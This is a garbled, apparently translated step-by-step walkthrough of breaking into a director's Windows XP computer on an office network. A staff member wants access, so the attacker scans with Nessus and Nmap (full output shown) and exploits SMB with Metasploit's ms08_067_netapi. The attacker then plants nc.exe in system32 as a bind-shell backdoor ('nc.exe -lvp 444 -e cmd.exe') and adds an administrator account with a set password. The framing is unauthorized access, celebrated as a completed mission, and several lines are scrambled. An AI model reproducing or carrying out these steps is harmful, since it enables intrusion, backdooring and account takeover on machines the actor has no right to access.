The document summarizes an attack on a Windows computer using Nmap and Metasploit to exploit the SMB vulnerability. It describes scanning the target computer with Nessus to find open ports and services, then using the ms08_067_netapi exploit in Metasploit to gain remote code execution via SMB. Once exploited, the attacker uploads a backdoor to the system32 folder and adds a new user account. The summary demonstrates gaining initial access, privilege escalation to add a new administrator account, and confirming remote command line access using the uploaded backdoor.

1. Backdor Nectcat With Smb
OS2C jogja (30/1-2012/02:29PM)- good morning, a right now we will exploit a
computer system the victim with IP address 172.18.10.4. we and victim be local
area network on equal. There Ip attacker 172.18.10.5 and other computer up with ip
172.18.10.1. so there we have 3 unit computer to LAN.
The ensuing structur skenario network :
The Scenario attacker used methode is hacker or attacker a delegate statf, while
attacker recived order form staf to the add user acount on computer director with
level as administrators acount director. In order to statf can acsess computer
director, upon office onely a statf can using login to computer director.
Oke the next, author begin technique how to add user to computer director with
used explot smb. Now attacker need tool aplication to get information a
victim(computer director). There we used nessus to find and search port, services
and vulnerbility application on computer, possible can to hole as do attacker exploit
computer target. The below we can see web application nessus.

2. the next we add ip target as object scan to know and find service and port open are
hole exploit computer target. To form the below must input information name
target, type (run now) and policy with choose internal network scan.
After we seting ip target next clik button scan launch scan now proses scanning
running, we waiting ouput scan information about computer victim.
Now information port, service and protocol to computer target we get. The next we
can know continue about description about all service. Now we choose protocol tcp
with port 139 is server message protocol to show info detail, the equal is picture
screenshoot information smb.

3. nmap -A 172.18.10.4
We can get information used other scan likes scanner via console is NMAP, the use
diffrent nmap and nessus a http://nmap.org ) at 2012-01-30 open port and servcie
Starting Nmap 5.61TEST4 ( operation searching and finding
07:15 AFT
with via console. For example using nmap :
Nmap scan report for 172.18.10.4
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-
ds
MAC Address: 08:00:27:94:14:34 (Cadmus Computer
Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: KITNET-02, NetBIOS user:
<unknown>, NetBIOS MAC: 08:00:27:94:14:34 (Cadmus
Computer Systems)
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: kitnet-02
| NetBIOS computer name: KITNET-02
| Workgroup: WORKGROUP
|_ System time: 2012-01-30 07:15:26 UTC-8
TRACEROUTE
HOP RTT ADDRESS
1 1.95 ms 172.18.10.4
OS and Service detection performed. Please report any
incorrect results at http://nmap.org/submit/ .

4. Near also we can see kind infomation uses nessus to nmap, but with nmap dont
have description, plugin, pid and solution. Now will exploit computer target :
Above picture is metaspolit, here attacker uses exploit framework3 on the
backtrack 4 r2. The next we use exploit smb. We user exploit server mail block
protocol(smb) with kind exploit exploit/windows/smb/ms08_067_netapi. And
next we applying payloads to smb using payload meterpreter,
windows/meterpreter/reverce_tcp and and we insert host target and host
attacker. While set RHOST is input to host target and set LHOST input to host
attacker.

5. And we have backdor will send bacdor to computer target.
After we include host target and host attacker and know located file backdor to
send computer target, furthermore we do exploit.
Now computer direcotor or target wass exploit, through meterperter we can do
upload and download file to located computer target. As image upon we can show
technique upload file backdor to file system32 windows. Upon we type commad

6. exploit computer attacker was sucsess on system32 computer target. And now
attacker running file backdor nc.exe to command line computer target.
Proses listening to port 444 while running. Command nc.exe –lvp 444 –e cmd.exe
mind file backdor run –l is listening to –p port 444, to port here attacker used port
444. Using port up to attacker can used port, 999,888, or 555. And command –v
backdor runing mode verbose (use twice to be more verbose).
Now this is mission add user to computer target, atttacker add name user to
computer targer wiht new user statf password: passtatf. And we can see new user
wass add to computer.
The next attacker same level access betwen acount director and statf. As picture
below we can show succses make start level administrators.

7. And the last computer start trying running nc through he computer, to sure know he
has have acoutn to computer director. TRADANGggg..... success complete the
mission a attacker on the jobs.